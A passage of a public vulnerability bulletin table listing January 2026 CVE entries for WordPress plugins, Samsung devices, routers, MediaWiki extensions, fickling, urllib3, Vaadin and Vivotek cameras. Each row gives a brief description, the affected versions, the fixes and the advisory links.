| Samsung Mobile--Samsung Cloud | Improper handling of insufficient permission in Samsung Cloud prior to version 5.6.11 allows local attackers to access specific files in arbitrary path. | 2026-01-09 | not yet calculated | CVE-2026-20975 | https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=01 |
| Samsung Mobile--Samsung Mobile Devices | Use after free in DualDAR prior to SMR Jan-2026 Release 1 allows local privileged attackers to execute arbitrary code. | 2026-01-09 | not yet calculated | CVE-2026-20968 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=01 |
| Samsung Mobile--Samsung Mobile Devices | Improper input validation in SecSettings prior to SMR Jan-2026 Release 1 allows local attacker to access file with system privilege. User interaction is required for triggering this vulnerability. | 2026-01-09 | not yet calculated | CVE-2026-20969 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=01 |
| Samsung Mobile--Samsung Mobile Devices | Improper access control in SLocation prior to SMR Jan-2026 Release 1 allows local attackers to execute the privileged APIs. | 2026-01-09 | not yet calculated | CVE-2026-20970 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=01 |
| Samsung Mobile--Samsung Mobile Devices | Use After Free in PROCA driver prior to SMR Jan-2026 Release 1 allows local attackers to potentially execute arbitrary code. | 2026-01-09 | not yet calculated | CVE-2026-20971 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=01 |
| Samsung Mobile--Samsung Mobile Devices | Improper Export of Android Application Components in UwbTest prior to SMR Jan-2026 Release 1 allows local attackers to enable UWB. | 2026-01-09 | not yet calculated | CVE-2026-20972 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=01 |
| Samsung Mobile--Samsung Mobile Devices | Improper input validation in data related to network restrictions prior to SMR Jan-2026 Release 1 allows physical attackers to bypass Carrier Relock. | 2026-01-09 | not yet calculated | CVE-2026-20974 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=01 |
| Shahjada--Visitor Stats Widget | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Shahjada Visitor Stats Widget visitor-stats-widget allows Reflected XSS.This issue affects Visitor Stats Widget: from n/a through <= 1.5.0. | 2026-01-08 | not yet calculated | CVE-2025-68874 | https://vdp.patchstack.com/database/Wordpress/Plugin/visitor-stats-widget/vulnerability/wordpress-visitor-stats-widget-plugin-1-5-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Shahjahan Jewel--Fluent Support | Missing Authorization vulnerability in Shahjahan Jewel Fluent Support fluent-support allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Fluent Support: from n/a through <= 1.10.4. | 2026-01-08 | not yet calculated | CVE-2025-67926 | https://vdp.patchstack.com/database/Wordpress/Plugin/fluent-support/vulnerability/wordpress-fluent-support-plugin-1-10-4-broken-access-control-vulnerability?_s_id=cve |
| Shahjahan Jewel--Ninja Tables | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Shahjahan Jewel Ninja Tables ninja-tables allows Blind SQL Injection.This issue affects Ninja Tables: from n/a through <= 5.2.4. | 2026-01-06 | not yet calculated | CVE-2025-69351 | https://vdp.patchstack.com/database/Wordpress/Plugin/ninja-tables/vulnerability/wordpress-ninja-tables-plugin-5-2-4-sql-injection-vulnerability?_s_id=cve |
| shinetheme--Traveler | Missing Authorization vulnerability in shinetheme Traveler traveler allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Traveler: from n/a through <= 3.2.6. | 2026-01-08 | not yet calculated | CVE-2025-67917 | https://vdp.patchstack.com/database/Wordpress/Theme/traveler/vulnerability/wordpress-traveler-theme-3-2-6-broken-access-control-vulnerability-2?_s_id=cve |
| silabs.com--Z-Wave Protocol Controller | An integer underflow vulnerability in the Silicon Labs Z-Wave Protocol Controller can lead to out of bounds memory reads. | 2026-01-05 | not yet calculated | CVE-2025-10933 | https://community.silabs.com/068Vm00000a4nNI |
| sizam--REHub Framework | Missing Authorization vulnerability in sizam REHub Framework rehub-framework allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects REHub Framework: from n/a through <= 19.9.5. | 2026-01-08 | not yet calculated | CVE-2025-14358 | https://vdp.patchstack.com/database/Wordpress/Plugin/rehub-framework/vulnerability/wordpress-rehub-framework-plugin-19-9-5-broken-access-control-vulnerability?_s_id=cve |
| Spencer Haws--Link Whisper Free | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spencer Haws Link Whisper Free link-whisper allows Reflected XSS.This issue affects Link Whisper Free: from n/a through <= 0.8.8. | 2026-01-08 | not yet calculated | CVE-2025-67927 | https://vdp.patchstack.com/database/Wordpress/Plugin/link-whisper/vulnerability/wordpress-link-whisper-free-plugin-0-8-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| StellarWP--The Events Calendar | Missing Authorization vulnerability in StellarWP The Events Calendar the-events-calendar allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects The Events Calendar: from n/a through <= 6.15.12.2. | 2026-01-06 | not yet calculated | CVE-2025-69352 | https://vdp.patchstack.com/database/Wordpress/Plugin/the-events-calendar/vulnerability/wordpress-the-events-calendar-plugin-6-15-12-2-broken-access-control-vulnerability?_s_id=cve |
| taskbuilder--Taskbuilder | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in taskbuilder Taskbuilder taskbuilder allows Reflected XSS.This issue affects Taskbuilder: from n/a through <= 4.0.9. | 2026-01-08 | not yet calculated | CVE-2025-67933 | https://vdp.patchstack.com/database/Wordpress/Plugin/taskbuilder/vulnerability/wordpress-taskbuilder-plugin-4-0-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| TECNO Mobile--com.afmobi.boomplayer | Insufficient Verification of Data Authenticity vulnerability in TECNO Mobile com.Afmobi.Boomplayer allows Authentication Bypass.This issue affects com.Afmobi.Boomplayer: 7.4.63. | 2026-01-06 | not yet calculated | CVE-2025-15385 | https://security.tecno.com/SRC/securityUpdates |
| Tenda--300Mbps Wireless Router F3 and N300 Easy Setup Router | This vulnerability exists in Tenda wireless routers (300Mbps Wireless Router F3 and N300 Easy Setup Router) due to the plaintext transmission of login credentials during the initial login or post-factory reset setup through the web-based administrative interface. An attacker on the same network could exploit this vulnerability by intercepting network traffic and capturing the credentials transmitted in plaintext. Successful exploitation of this vulnerability could allow the attacker to obtain sensitive information and gain unauthorized access to the targeted device. | 2026-01-09 | not yet calculated | CVE-2026-22079 | https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2026-0004 |
| Tenda--300Mbps Wireless Router F3 and N300 Easy Setup Router | This vulnerability exists in Tenda wireless routers (300Mbps Wireless Router F3 and N300 Easy Setup Router) due to the transmission of credentials encoded using reversible Base64 encoding through the web-based administrative interface. An attacker on the same network could exploit this vulnerability by intercepting network traffic and capturing the Base64-encoded credentials. Successful exploitation of this vulnerability could allow the attacker to obtain sensitive information and gain unauthorized access to the targeted device. | 2026-01-09 | not yet calculated | CVE-2026-22080 | https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2026-0004 |
| Tenda--300Mbps Wireless Router F3 and N300 Easy Setup Router | This vulnerability exists in Tenda wireless routers (300Mbps Wireless Router F3 and N300 Easy Setup Router) due to the missing HTTPOnly flag for session cookies associated with the web-based administrative interface. A remote at-tacker could exploit this vulnerability by capturing session cookies transmitted over an insecure HTTP connection. Successful exploitation of this vulnerability could allow the attacker to obtain sensitive information and gain unau-thorized access to the targeted device. | 2026-01-09 | not yet calculated | CVE-2026-22081 | https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2026-0004 |
| Tenda--300Mbps Wireless Router F3 and N300 Easy Setup Router | This vulnerability exists in Tenda wireless routers (300Mbps Wireless Router F3 and N300 Easy Setup Router) due to the use of login credentials as the session ID through its web-based administrative interface. A remote attacker could exploit this vulnerability by intercepting network traffic and capturing the session ID during insecure transmission. Successful exploitation of this vulnerability could allow the attacker to hijack an authenticated session and compromise sensitive configuration information on the targeted device. | 2026-01-09 | not yet calculated | CVE-2026-22082 | https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2026-0004 |
| The Wikimedia Foundation--Mediawiki - ApprovedRevs Extension | Improper Encoding or Escaping of Output due to magic word replacement in ParserAfterTidy vulnerability in The Wikimedia Foundation Mediawiki - ApprovedRevs Extension allows Input Data Manipulation.This issue affects Mediawiki - ApprovedRevs Extension: 1.45, 1.44, 1.43, 1.39. | 2026-01-09 | not yet calculated | CVE-2026-22712 | https://phabricator.wikimedia.org/T412068 https://gerrit.wikimedia.org/r/q/Iee1bf1cbc8a519899e7f9dde508856bd4e5a5d2a |
| The Wikimedia Foundation--Mediawiki - GrowthExperiments Extension | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in The Wikimedia Foundation Mediawiki - GrowthExperiments Extension allows Cross-Site Scripting (XSS).This issue affects Mediawiki - GrowthExperiments Extension: 1.45, 1.44, 1.43, 1.39. | 2026-01-09 | not yet calculated | CVE-2026-22713 | https://phabricator.wikimedia.org/T411144 https://gerrit.wikimedia.org/r/q/Iff01940a163ed87ec52f3a64ba6b2dbfa2759df3 |
| The Wikimedia Foundation--Mediawiki - Monaco Skin | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in The Wikimedia Foundation Mediawiki - Monaco Skin allows Cross-Site Scripting (XSS).This issue affects Mediawiki - Monaco Skin: 1.45, 1.44, 1.43, 1.39. | 2026-01-08 | not yet calculated | CVE-2026-22714 | https://phabricator.wikimedia.org/T411126 https://gerrit.wikimedia.org/r/q/I00b2e369fa189803380ca7409022a11b670d2500 |
| The Wikimedia Foundation--Mediawiki - Wikibase Extension | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in The Wikimedia Foundation Mediawiki - Wikibase Extension allows Cross-Site Scripting (XSS).This issue affects Mediawiki - Wikibase Extension: 1.45, 1.44, 1.43, 1.39. | 2026-01-08 | not yet calculated | CVE-2026-22710 | https://phabricator.wikimedia.org/T409737 https://gerrit.wikimedia.org/r/q/I39d0074b2ad022b6efe6ab3dd8c8ec0f86c6c466 |
| ThemeGoods--Grand Restaurant | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Restaurant grandrestaurant allows Reflected XSS.This issue affects Grand Restaurant: from n/a through < 7.0.9. | 2026-01-08 | not yet calculated | CVE-2025-67922 | https://vdp.patchstack.com/database/Wordpress/Theme/grandrestaurant/vulnerability/wordpress-grand-restaurant-theme-7-0-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| THEMELOGI--Navian | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in THEMELOGI Navian navian allows PHP Local File Inclusion.This issue affects Navian: from n/a through <= 1.5.4. | 2026-01-08 | not yet calculated | CVE-2025-14431 | https://vdp.patchstack.com/database/Wordpress/Theme/navian/vulnerability/wordpress-navian-theme-1-5-4-local-file-inclusion-vulnerability?_s_id=cve |
| ThemeMove--AeroLand | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeMove AeroLand aeroland allows PHP Local File Inclusion.This issue affects AeroLand: from n/a through <= 1.6.6. | 2026-01-08 | not yet calculated | CVE-2025-14429 | https://vdp.patchstack.com/database/Wordpress/Theme/aeroland/vulnerability/wordpress-aeroland-theme-1-6-6-local-file-inclusion-vulnerability?_s_id=cve |
| ThemeMove--Brook - Agency Business Creative | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeMove Brook - Agency Business Creative brook allows PHP Local File Inclusion.This issue affects Brook - Agency Business Creative: from n/a through <= 2.8.9. | 2026-01-08 | not yet calculated | CVE-2025-14430 | https://vdp.patchstack.com/database/Wordpress/Theme/brook/vulnerability/wordpress-brook-agency-business-creative-theme-2-8-9-local-file-inclusion-vulnerability?_s_id=cve |
| ThemeMove--Mitech | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeMove Mitech mitech allows PHP Local File Inclusion.This issue affects Mitech: from n/a through <= 2.3.4. | 2026-01-08 | not yet calculated | CVE-2025-22708 | https://vdp.patchstack.com/database/Wordpress/Theme/mitech/vulnerability/wordpress-mitech-theme-2-3-4-local-file-inclusion-vulnerability?_s_id=cve |
| ThemeMove--Moody | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeMove Moody tm-moody allows PHP Local File Inclusion.This issue affects Moody: from n/a through <= 2.7.3. | 2026-01-08 | not yet calculated | CVE-2025-22707 | https://vdp.patchstack.com/database/Wordpress/Theme/tm-moody/vulnerability/wordpress-moody-theme-2-7-3-local-file-inclusion-vulnerability?_s_id=cve |
| Themepoints--Accordion | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themepoints Accordion accordions-wp allows Stored XSS.This issue affects Accordion: from n/a through <= 3.0.3. | 2026-01-06 | not yet calculated | CVE-2025-69350 | https://vdp.patchstack.com/database/Wordpress/Plugin/accordions-wp/vulnerability/wordpress-accordion-plugin-3-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Themepoints--Team Showcase | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themepoints Team Showcase team-showcase allows Stored XSS.This issue affects Team Showcase: from n/a through <= 2.9. | 2026-01-06 | not yet calculated | CVE-2025-69335 | https://vdp.patchstack.com/database/Wordpress/Plugin/team-showcase/vulnerability/wordpress-team-showcase-plugin-2-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| themesuite--Automotive Listings | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in themesuite Automotive Listings automotive allows Blind SQL Injection.This issue affects Automotive Listings: from n/a through <= 18.6. | 2026-01-08 | not yet calculated | CVE-2025-67928 | https://vdp.patchstack.com/database/Wordpress/Plugin/automotive/vulnerability/wordpress-automotive-listings-plugin-18-6-sql-injection-vulnerability?_s_id=cve |
| Tickera--Tickera | Missing Authorization vulnerability in Tickera Tickera tickera-event-ticketing-system allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Tickera: from n/a through <= 3.5.6.4. | 2026-01-06 | not yet calculated | CVE-2025-69355 | https://vdp.patchstack.com/database/Wordpress/Plugin/tickera-event-ticketing-system/vulnerability/wordpress-tickera-plugin-3-5-6-4-broken-access-control-vulnerability?_s_id=cve |
| TMRW-studio--Atlas | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in TMRW-studio Atlas atlas allows PHP Local File Inclusion.This issue affects Atlas: from n/a through <= 2.1.0. | 2026-01-08 | not yet calculated | CVE-2025-22509 | https://vdp.patchstack.com/database/Wordpress/Theme/atlas/vulnerability/wordpress-atlas-theme-2-1-0-local-file-inclusion-vulnerability?_s_id=cve |
| TP-Link Systems Inc.--Archer AXE75 v1.6 | Improper Input Validation vulnerability in TP-Link Archer AXE75 v1.6 (vpn modules) allows an authenticated adjacent attacker to delete arbitrary server file, leading to possible loss of critical system files and service interruption or degraded functionality.This issue affects Archer AXE75 v1.6: ≤ build 20250107. | 2026-01-09 | not yet calculated | CVE-2025-15035 | https://github.com/PaloAltoNetworks/u42-vulnerability-disclosures/tree/master/2025/PANW-2025-0004 https://www.tp-link.com/us/support/download/archer-axe75/v1/#Firmware https://www.tp-link.com/en/support/download/archer-axe75/v1/#Firmware https://www.tp-link.com/jp/support/download/archer-axe75/v1/#Firmware https://www.tp-link.com/phppage/preview.php?url=https://www.tp-link.com/en/support/faq/4881/ |
| TP-Link Systems Inc.--Archer BE400 | A NULL Pointer Dereference vulnerability in TP-Link Archer BE400 V1(802.11 modules) allows an adjacent attacker to cause a denial-of-service (DoS) by triggering a device reboot. This issue affects Archer BE400: xi 1.1.0 Build 20250710 rel.14914. | 2026-01-07 | not yet calculated | CVE-2025-14631 | https://www.tp-link.com/en/support/download/archer-be400/v1/#Firmware https://www.tp-link.com/us/support/download/archer-be400/#Firmware https://www.tp-link.com/us/support/faq/4871/ |
| trailofbits--fickling | Fickling is a Python pickling decompiler and static analyzer. Fickling versions up to and including 0.1.6 do not treat Python's runpy module as unsafe. Because of this, a malicious pickle that uses runpy.run_path() or runpy.run_module() is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS. If a user relies on Fickling's output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system. This affects any workflow or product that uses Fickling as a security gate for pickle deserialization. This issue has been patched in version 0.1.7. | 2026-01-10 | not yet calculated | CVE-2026-22606 | https://github.com/trailofbits/fickling/security/advisories/GHSA-wfq2-52f7-7qvj https://github.com/trailofbits/fickling/commit/9a2b3f89bd0598b528d62c10a64c1986fcb09f66 https://github.com/trailofbits/fickling/releases/tag/v0.1.7 |
| trailofbits--fickling | Fickling is a Python pickling decompiler and static analyzer. Fickling versions up to and including 0.1.6 do not treat Python's cProfile module as unsafe. Because of this, a malicious pickle that uses cProfile.run() is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS. If a user relies on Fickling's output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system. This affects any workflow or product that uses Fickling as a security gate for pickle deserialization. This issue has been patched in version 0.1.7. | 2026-01-10 | not yet calculated | CVE-2026-22607 | https://github.com/trailofbits/fickling/security/advisories/GHSA-p523-jq9w-64x9 https://github.com/trailofbits/fickling/commit/dc8ae12966edee27a78fe05c5745171a2b138d43 https://github.com/trailofbits/fickling/releases/tag/v0.1.7 |
| trailofbits--fickling | Fickling is a Python pickling decompiler and static analyzer. Prior to version 0.1.7, both ctypes and pydoc modules aren't explicitly blocked. Even other existing pickle scanning tools (like picklescan) do not block pydoc.locate. Chaining these two together can achieve RCE while the scanner still reports the file as LIKELY_SAFE. This issue has been patched in version 0.1.7. | 2026-01-10 | not yet calculated | CVE-2026-22608 | https://github.com/trailofbits/fickling/security/advisories/GHSA-5hvc-6wx8-mvv4 https://github.com/trailofbits/fickling/commit/b793563e60a5e039c5837b09d7f4f6b92e6040d1 https://github.com/trailofbits/fickling/releases/tag/v0.1.7 |
| trailofbits--fickling | Fickling is a Python pickling decompiler and static analyzer. Prior to version 0.1.7, the unsafe_imports() method in Fickling's static analyzer fails to flag several high-risk Python modules that can be used for arbitrary code execution. Malicious pickles importing these modules will not be detected as unsafe, allowing attackers to bypass Fickling's primary static safety checks. This issue has been patched in version 0.1.7. | 2026-01-10 | not yet calculated | CVE-2026-22609 | https://github.com/trailofbits/fickling/security/advisories/GHSA-q5qq-mvfm-j35x https://github.com/trailofbits/fickling/commit/29d5545e74b07766892c1f0461b801afccee4f91 https://github.com/trailofbits/fickling/commit/9a2b3f89bd0598b528d62c10a64c1986fcb09f66 https://github.com/trailofbits/fickling/commit/b793563e60a5e039c5837b09d7f4f6b92e6040d1 https://github.com/trailofbits/fickling/commit/eb299b453342f1931c787bcb3bc33f3a03a173f9 https://github.com/trailofbits/fickling/releases/tag/v0.1.7 |
| trailofbits--fickling | Fickling is a Python pickling decompiler and static analyzer. Prior to version 0.1.7, Fickling is vulnerable to detection bypass due to "builtins" blindness. This issue has been patched in version 0.1.7. | 2026-01-10 | not yet calculated | CVE-2026-22612 | https://github.com/trailofbits/fickling/security/advisories/GHSA-h4rm-mm56-xf63 https://github.com/trailofbits/fickling/commit/9f309ab834797f280cb5143a2f6f987579fa7cdf https://github.com/trailofbits/fickling/releases/tag/v0.1.7 |
| Tribulant Software--Newsletters | Deserialization of Untrusted Data vulnerability in Tribulant Software Newsletters newsletters-lite allows Object Injection.This issue affects Newsletters: from n/a through <= 4.11. | 2026-01-08 | not yet calculated | CVE-2025-67911 | https://vdp.patchstack.com/database/Wordpress/Plugin/newsletters-lite/vulnerability/wordpress-newsletters-plugin-4-11-php-object-injection-vulnerability?_s_id=cve |
| TryGhost--Ghost | Ghost is a Node.js content management system. In versions 5.38.0 through 5.130.5 and 6.0.0 through 6.10.3, a vulnerability in Ghost's media inliner mechanism allows staff users in possession of a valid authentication token for the Ghost Admin API to exfiltrate data from internal systems via SSRF. This issue has been patched in versions 5.130.6 and 6.11.0. | 2026-01-10 | not yet calculated | CVE-2026-22597 | https://github.com/TryGhost/Ghost/security/advisories/GHSA-vmc4-9828-r48r https://github.com/TryGhost/Ghost/commit/15d49131ff4aac3aca8642501c793f01f2bfcbb9 https://github.com/TryGhost/Ghost/commit/93add549ccf079d8e28bdb724fbb71a76942ff51 |
| Ubiquiti Inc--airMAX AC | A malicious actor in Wi-Fi range of the affected product could leverage a vulnerability in the airMAX Wireless Protocol to achieve a remote code execution (RCE) within the affected product. Affected Products: airMAX AC (Version 8.7.20 and earlier) airMAX M (Version 6.3.22 and earlier) airFiber AF60-XG (Version 1.2.2 and earlier) airFiber AF60 (Version 2.6.7 and earlier) Mitigation: Update your airMAX AC to Version 8.7.21 or later. Update your airMAX M to Version 6.3.24 or later. Update your airFiber AF60-XG to Version 1.2.3 or later. Update your airFiber AF60 to Version 2.6.8 or later. | 2026-01-08 | not yet calculated | CVE-2026-21639 | https://community.ui.com/releases/Security-Advisory-Bulletin-061-061/1e4fe5f8-29c7-4a7d-a518-01b1537983ba |
| Unknown--FlexTable | The FlexTable WordPress plugin before 3.19.2 does not sanitise and escape the imported links from Google Sheet cells, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2026-01-05 | not yet calculated | CVE-2025-9543 | https://wpscan.com/vulnerability/6cc212f4-aa61-409a-b257-9c920956a401/ |
| Unknown--Frontend File Manager Plugin | The Frontend File Manager Plugin WordPress plugin before 23.5 did not validate a path parameter and ownership of the file, allowing any authenticated users, such as subscribers to delete arbitrary files on the server | 2026-01-07 | not yet calculated | CVE-2025-14804 | https://wpscan.com/vulnerability/c572c0ad-1b36-49ce-b254-2181e53abb46/ |
| Unknown--NEX-Forms | The NEX-Forms WordPress plugin before 9.1.8 does not sanitise and escape some of its settings. The NEX-Forms WordPress plugin before 9.1.8 can be configured in such a way that could allow subscribers to perform Stored Cross-Site Scripting. | 2026-01-09 | not yet calculated | CVE-2025-14803 | https://wpscan.com/vulnerability/219af0e7-3d8b-4405-8005-b8969a370b0b/ |
| Unknown--Relevanssi | The Relevanssi WordPress plugin before 4.26.0, Relevanssi Premium WordPress plugin before 2.29.0 do not sanitize and escape a parameter before using it in a SQL statement, allowing contributor and above roles to perform SQL injection attacks | 2026-01-07 | not yet calculated | CVE-2025-14719 | https://wpscan.com/vulnerability/bd8e27c7-8f97-4313-b16e-50ac6f0676f5/ |
| Unknown--Team | The Team WordPress plugin before 5.0.11 does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection. | 2026-01-05 | not yet calculated | CVE-2025-14124 | https://wpscan.com/vulnerability/fdd19027-b70e-45a4-882b-77ab1819af91/ |
| urllib3--urllib3 | urllib3 is an HTTP client library for Python. urllib3's streaming API is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. urllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). When using the streaming API, the library decompresses only the necessary bytes, enabling partial content consumption. Starting in version 1.22 and prior to version 2.6.3, for HTTP redirect responses, the library would read the entire response body to drain the connection and decompress the content unnecessarily. This decompression occurred even before any read methods were called, and configured read limits did not restrict the amount of decompressed data. As a result, there was no safeguard against decompression bombs. A malicious server could exploit this to trigger excessive resource consumption on the client. Applications and libraries are affected when they stream content from untrusted sources by setting `preload_content=False` when they do not disable redirects. Users should upgrade to at least urllib3 v2.6.3, in which the library does not decode content of redirect responses when `preload_content=False`. If upgrading is not immediately possible, disable redirects by setting `redirect=False` for requests to untrusted source. | 2026-01-07 | not yet calculated | CVE-2026-21441 | https://github.com/urllib3/urllib3/security/advisories/GHSA-38jv-5279-wg99 https://github.com/urllib3/urllib3/commit/8864ac407bba8607950025e0979c4c69bc7abc7b |
| vaadin--vaadin | Action captions in Vaadin accept HTML by default but were not sanitized, potentially allowing Cross-site Scripting (XSS) if caption content is derived from user input. In Vaadin Framework 7 and 8, the Action class is a general-purpose class that may be used by multiple components. The fixed versions sanitize captions by default and provide an API to explicitly enable HTML content mode for backwards compatibility. In Vaadin 23 and newer, the Action class is only used by the Spreadsheet component. The fixed versions sanitize HTML using Jsoup with a relaxed safelist. Vaadin 14 is not affected as Spreadsheet component was not supported. Users of affected versions should apply the following mitigation or upgrade. Releases that have fixed this issue include: Product version Vaadin 7.0.0 - 7.7.49 Vaadin 8.0.0 - 8.29.1 Vaadin 23.1.0 - 23.6.5 Vaadin 24.0.0 - 24.8.13 Vaadin 24.9.0 - 24.9.6 Mitigation Upgrade to 7.7.50 Upgrade to 8.30.0 Upgrade to 23.6.6 Upgrade to 24.8.14 or 24.9.7 Upgrade to 25.0.0 or newer Artifacts Maven coordinatesVulnerable versionsFixed versioncom.vaadin:vaadin-server 7.0.0 - 7.7.49 ≥7.7.50 com.vaadin:vaadin-server 8.0.0 - 8.29.1 ≥8.30.0 com.vaadin:vaadin 23.1.0 - 23.6.5 ≥23.6.6 com.vaadin:vaadin24.0.0 - 24.8.13 ≥24.8.14 com.vaadin:vaadin24.9.0 - 24.9.6 ≥24.9.7 com.vaadin:vaadin-spreadsheet-flow 23.1.0 - 23.6.5 ≥23.6.6 com.vaadin:vaadin-spreadsheet-flow 24.0.0 - 24.8.13 ≥24.8.14 com.vaadin:vaadin-spreadsheet-flow 24.9.0 - 24.9.6 ≥24.9.7 | 2026-01-05 | not yet calculated | CVE-2025-15022 | https://vaadin.com/security/cve-2025-15022 https://github.com/vaadin/flow-components/pull/8285 |
| VanKarWai--Calafate | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in VanKarWai Calafate calafate allows PHP Local File Inclusion.This issue affects Calafate: from n/a through <= 1.7.7. | 2026-01-06 | not yet calculated | CVE-2025-69342 | https://vdp.patchstack.com/database/Wordpress/Theme/calafate/vulnerability/wordpress-calafate-theme-1-7-7-local-file-inclusion-vulnerability?_s_id=cve |
| VanKarWai--Lobo | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in VanKarWai Lobo lobo allows Blind SQL Injection.This issue affects Lobo: from n/a through < 2.8.6. | 2026-01-08 | not yet calculated | CVE-2025-67921 | https://vdp.patchstack.com/database/Wordpress/Theme/lobo/vulnerability/wordpress-lobo-theme-2-8-6-sql-injection-vulnerability?_s_id=cve |
| vanquish--WooCommerce Orders & Customers Exporter | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in vanquish WooCommerce Orders & Customers Exporter woocommerce-orders-ei allows SQL Injection.This issue affects WooCommerce Orders & Customers Exporter: from n/a through <= 5.4. | 2026-01-08 | not yet calculated | CVE-2025-22713 | https://vdp.patchstack.com/database/Wordpress/Plugin/woocommerce-orders-ei/vulnerability/wordpress-woocommerce-orders-customers-exporter-plugin-5-4-sql-injection-vulnerability?_s_id=cve |
| Vernon Systems Limited--eHive Search | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Vernon Systems Limited eHive Search ehive-search allows Reflected XSS.This issue affects eHive Search: from n/a through <= 2.5.0. | 2026-01-08 | not yet calculated | CVE-2025-67930 | https://vdp.patchstack.com/database/Wordpress/Plugin/ehive-search/vulnerability/wordpress-ehive-search-plugin-2-5-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Vivotek--IP7137 | Vivotek IP7137 camera with firmware version 0200a is vulnerable to an information disclosure issue where live camera footage can be accessed through the RTSP protocol on port 8554 without requiring authentication. This allows unauthorized users with network access to view the camera's feed, potentially compromising user privacy and security. The vendor has not replied to the CNA. Possibly all firmware versions are affected. Since the product has met End-Of-Life phase, a fix is not expected to be released. | 2026-01-09 | not yet calculated | CVE-2025-66049 | https://cert.pl/posts/2026/01/CVE-2025-66049 |
| Vivotek--IP7137 | Vivotek IP7137 camera with firmware version 0200a by default dos not require to provide any password when logging in as an administrator. While it is possible to set up such a password, a user is not informed about such a need. The vendor has not replied to the CNA. Possibly all firmware versions are affected. Since the product has met End-Of-Life phase, a fix is not expected to be released. | 2026-01-09 | not yet calculated | CVE-2025-66050 | https://cert.pl/posts/2026/01/CVE-2025-66049 |
| Vivotek--IP7137 | Vivotek IP7137 camera with firmware version 0200a is vulnerable to path traversal. It is possible for an authenticated attacker to access resources beyond webroot directory using a direct HTTP request. Due to CVE-2025-66050, a password for administration panel is not set by default. The vendor has not replied to the CNA. Possibly all firmware versions are affected. Since the product has met End-Of-Life phase, a fix is not expected to be released. | 2026-01-09 | not yet calculated | CVE-2025-66051 | https://cert.pl/posts/2026/01/CVE-2025-66049 |
| Vivotek--IP7137 | Vivotek IP7137 camera with firmware version 0200a is vulnerable to command injection. Parameter "system_ntpIt" used by "/cgi-bin/admin/setparam.cgi" endpoint is not sanitized properly, allowing a user with administrative privileges to perform an attack. Due to CVE-2025-66050, administrative access is not protected by default, The vendor has not replied to the CNA Possibly all firmware versions are affected. Since the product has met End-Of-Life phase, a fix is not expected to be released. | 2026-01-09 | not yet calculated | CVE-2025-66052 | https://cert.pl/posts/2026/01/CVE-2025-66049 |
| Wikimedia Foundation--MediaWiki - CampaignEvents extension | Missing Authorization vulnerability in Wikimedia Foundation MediaWiki - CampaignEvents extension allows Privilege Abuse.This issue affects MediaWiki - CampaignEvents extension: 1.45, 1.44, 1.43, 1.39. | 2026-01-09 | not yet calculated | CVE-2026-0817 | https://phabricator.wikimedia.org/T410560 https://gerrit.wikimedia.org/r/q/I7ed0049691258c8bd2555e599b9b88490fbe3358 |
